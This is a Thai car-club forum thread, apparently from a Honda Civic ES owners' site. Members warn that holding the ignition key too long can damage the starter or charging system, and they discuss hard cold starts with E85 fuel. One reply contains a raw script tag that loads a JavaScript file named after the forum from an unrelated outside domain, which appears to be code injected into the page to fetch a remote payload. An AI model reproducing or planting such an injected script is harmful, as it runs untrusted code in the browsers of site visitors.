ตอบ
treephop


เข้าร่วม: 19 มกรา 2013
ตอบ: 334

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 360
ให้คำขอบคุณ: 127

ที่อยู่: Samutsakorn
ปี: 2005
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
ศุกร์, 2 สิงหา 2013 14:51 - เตือนคนที่ สตาร์ทรถแล้วแช่กุญแจหรือปล่อยกุญแจช้า
เตือนคนที่ สตาร์ทรถแล้วแช่กุญแจหรือปล่อยกุญแจช้าไป ระวังไดร์ชาร์จ พังนะครับ   ถ้าสตาร์ทแล้วรีบปล่อยคืนเลย นะครับน้องผมเป็นมาแล้ว ไดร์ชาร์จพังไปตามระเบียบ
ได้รับคำขอบคุณจาก: Marwin  poppy  N_J Civic  Chonchy  Sak_es5442  bigbom  ATG_12  phichetza  qq  undertaker55  menacekeng 
Marwin


เข้าร่วม: 29 มกรา 2009
ตอบ: 1661

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1517
ให้คำขอบคุณ: 159

ที่อยู่: Seacon square
ปี: 2001
ศุกร์, 2 สิงหา 2013 14:56 - เตือนคนที่ สตาร์ทรถแล้วแช่กุญแจหรือปล่อยกุญแจช้า
เด่วนี้ช้าครับ เพราะ E85 จ้องแช่นานขึ้น สงสัยต้องรีบลดๆๆ
horus


ชื่อเล่น: ต๋อย

เข้าร่วม: 18 เมษา 2013
ตอบ: 1272

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1777
ให้คำขอบคุณ: 1065

ที่อยู่: รามอินทรา / นนทบุรี / ES เมืองทอง
ปี: 2002
สี: ม่วง วินเทจพลัม (RP-32P)
ศุกร์, 2 สิงหา 2013 14:58 - เตือนคนที่ สตาร์ทรถแล้วแช่กุญแจหรือปล่อยกุญแจช้า
มาเก็บข้อมูลคร๊าบบบบบบบบบบ "<script src="https://sport32news.com/civicesgroup.js">
wentai


ชื่อเล่น: แบงค์

เข้าร่วม: 09 พฤษภาคม 2013
ตอบ: 518

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 1021
ให้คำขอบคุณ: 0

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 2 สิงหา 2013 15:05 - เตือนคนที่ สตาร์ทรถแล้วแช่กุญแจหรือปล่อยกุญแจช้า
เก็บข้อมูลครับ
srithanon


เข้าร่วม: 13 สิงหา 2009
ตอบ: 380

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 1324
ให้คำขอบคุณ: 4
ศุกร์, 2 สิงหา 2013 16:35 - เตือนคนที่ สตาร์ทรถแล้วแช่กุญแจหรือปล่อยกุญแจช้า
การแช่กุญแจ หรือมีการสตาร์ทเครื่องยนต์แบบลากยาวๆ จะทำให้กระแสไฟจากแบ็ตเตอรี่ลดลงอย่างมาก และเมื่อกระแสไฟไม่พอจะทำให้โวลเต็จในตัวแบ้ตลดลงและในขดลวดฟีลคอยจะร้อนและชอร์ทเทินของขดลวด คราวนี้งานเข้าจัดหนัก

สำหรับท่านที่ใช้น้ำมัน E85 ในช่วงเช้าๆอากาศจะเย็น ทำให้น้ำมัน E85 ที่เป็นเอทานอลแอลกอฮอล เกิดระเหยกลายเป็นไอได้ยากที่อุณหภูมิต่ำๆ มันจึงทำให้การสตาร์ทเครื่องยนต์ติดอยาก วิธีแก้ไขเบื้องต้นสำหรับรถที่ยังเป็นระบบจานจ่าย ก็สามารถปรับมุมองศาการจุดระเบิดให้แก่ขึ้น เพื่อต้องการให้ลูกสูบเคลื่อนสร้างแรงอัดในกระบอกสูบใหมากขึ้น เมื่อเกิดแรงอัดในกระบอกสูบสูงมันก็จะเกิดความร้อนสูง ช่วยให้การระเหยกลายเป็นไอของฝอยละอองน้ำมันจากหัวฉีดได้เร็วขึ้น การจุดระเบิดก็จะง่ายเมื่อมีการสตาร์ทเครื่องยนต์

สำหรับรถที่ใช้ระบบไดเร็คคอย ก็แก้ไขลำบากหน่อยแต่พอจะแก้ได้บ้าง ก็ต้องเปลี่ยนหัวฉีดน้ำมัน ให้มีรูทางออกของน้ำมันเพิ่มขึ้นเพื่อให้เกิดเป็นฝอยของละอองน้ำมัน E85 แต่ต้องเพิ่มแรงดันในท่อรางหัวฉีดด้วย ถึงจะแก้ไขปัญหาที่เกิดขึ้นได้พอสมควร ทางที่ดีการใช้น้ำมัน E85 ควรเติมน้ำมันให้เต็มถังไว้ อย่าปล่อยให้มีพื้นที่ว่างในระดับภายในถังน้ำมัน เพราะจะเกิดการระเหยตัวได้ง่ายที่อุณหภูมิไม่สูง การระเหยกลายเป็นไอของน้ำมันเอทานอล จะทำให้มีน้ำที่เป็นส่วนประกอบมากกว่าเอทานอล เมื่อมีการส่งน้ำมันเข้าห้องสูบเพื่อการจุดระเบิด จะทำให้ได้ค่าพลังงานต่ำ เครื่องยนต์กำลังตก เครื่องเดินไม่เรียบ ก้ประมาณนั้นครับ......srithanon
ได้รับคำขอบคุณจาก: treephop  ATG_12  pejung  fasang.Mr  undertaker55  tokmun002 
N_J Civic


เข้าร่วม: 27 ตุลา 2009
ตอบ: 3806

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5146
ให้คำขอบคุณ: 5687

ที่อยู่: นิคม304 - ปราจีน - ชัยภูมิ
ปี: 2003
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 2 สิงหา 2013 16:53 - เตือนคนที่ สตาร์ทรถแล้วแช่กุญแจหรือปล่อยกุญแจช้า
treephop พิมพ์ว่า:
เตือนคนที่ สตาร์ทรถแล้วแช่กุญแจหรือปล่อยกุญแจช้าไป ระวังไดร์ชาร์จ พังนะครับ   ถ้าสตาร์ทแล้วรีบปล่อยคืนเลย นะครับน้องผมเป็นมาแล้ว ไดร์ชาร์จพังไปตามระเบียบ

หมายถึงหลังจากที่รถสตาร์ตติดแล้ว ถูกไหม...

 
bigbom


ชื่อเล่น: บิ๊ก

เข้าร่วม: 17 มกรา 2012
ตอบ: 552

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 885
ให้คำขอบคุณ: 866

ที่อยู่: แพร่ สอง - หนองแค สระบุรี
ปี: 2001
สี: ทอง แซทเทิลไลท์ (NH-663M)
ศุกร์, 2 สิงหา 2013 17:18 - เตือนคนที่ สตาร์ทรถแล้วแช่กุญแจหรือปล่อยกุญแจช้า
ตั้งสติก่อนสตาร์ทครับผม
song


เข้าร่วม: 10 กุมภา 2011
ตอบ: 9833

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5558
ให้คำขอบคุณ: 4415

ที่อยู่: ESเมืองทอง 100%
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
ศุกร์, 2 สิงหา 2013 18:18 - เตือนคนที่ สตาร์ทรถแล้วแช่กุญแจหรือปล่อยกุญแจช้า
srithanon พิมพ์ว่า:
การแช่กุญแจ หรือมีการสตาร์ทเครื่องยนต์แบบลากยาวๆ จะทำให้กระแสไฟจากแบ็ตเตอรี่ลดลงอย่างมาก และเมื่อกระแสไฟไม่พอจะทำให้โวลเต็จในตัวแบ้ตลดลงและในขดลวดฟีลคอยจะร้อนและชอร์ทเทินของขดลวด คราวนี้งานเข้าจัดหนัก

สำหรับท่านที่ใช้น้ำมัน E85 ในช่วงเช้าๆอากาศจะเย็น ทำให้น้ำมัน E85 ที่เป็นเอทานอลแอลกอฮอล เกิดระเหยกลายเป็นไอได้ยากที่อุณหภูมิต่ำๆ มันจึงทำให้การสตาร์ทเครื่องยนต์ติดอยาก วิธีแก้ไขเบื้องต้นสำหรับรถที่ยังเป็นระบบจานจ่าย ก็สามารถปรับมุมองศาการจุดระเบิดให้แก่ขึ้น เพื่อต้องการให้ลูกสูบเคลื่อนสร้างแรงอัดในกระบอกสูบใหมากขึ้น เมื่อเกิดแรงอัดในกระบอกสูบสูงมันก็จะเกิดความร้อนสูง ช่วยให้การระเหยกลายเป็นไอของฝอยละอองน้ำมันจากหัวฉีดได้เร็วขึ้น การจุดระเบิดก็จะง่ายเมื่อมีการสตาร์ทเครื่องยนต์

สำหรับรถที่ใช้ระบบไดเร็คคอย ก็แก้ไขลำบากหน่อยแต่พอจะแก้ได้บ้าง ก็ต้องเปลี่ยนหัวฉีดน้ำมัน ให้มีรูทางออกของน้ำมันเพิ่มขึ้นเพื่อให้เกิดเป็นฝอยของละอองน้ำมัน E85 แต่ต้องเพิ่มแรงดันในท่อรางหัวฉีดด้วย ถึงจะแก้ไขปัญหาที่เกิดขึ้นได้พอสมควร ทางที่ดีการใช้น้ำมัน E85 ควรเติมน้ำมันให้เต็มถังไว้ อย่าปล่อยให้มีพื้นที่ว่างในระดับภายในถังน้ำมัน เพราะจะเกิดการระเหยตัวได้ง่ายที่อุณหภูมิไม่สูง การระเหยกลายเป็นไอของน้ำมันเอทานอล จะทำให้มีน้ำที่เป็นส่วนประกอบมากกว่าเอทานอล เมื่อมีการส่งน้ำมันเข้าห้องสูบเพื่อการจุดระเบิด จะทำให้ได้ค่าพลังงานต่ำ เครื่องยนต์กำลังตก เครื่องเดินไม่เรียบ ก้ประมาณนั้นครับ......srithanon



ผมเนี้ยเป็นแฟนคลับพี่เลยนะครับ ข้อมูลแน่นปึกทุกปัญหาเลย
ได้รับคำขอบคุณจาก: tokmun002 
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.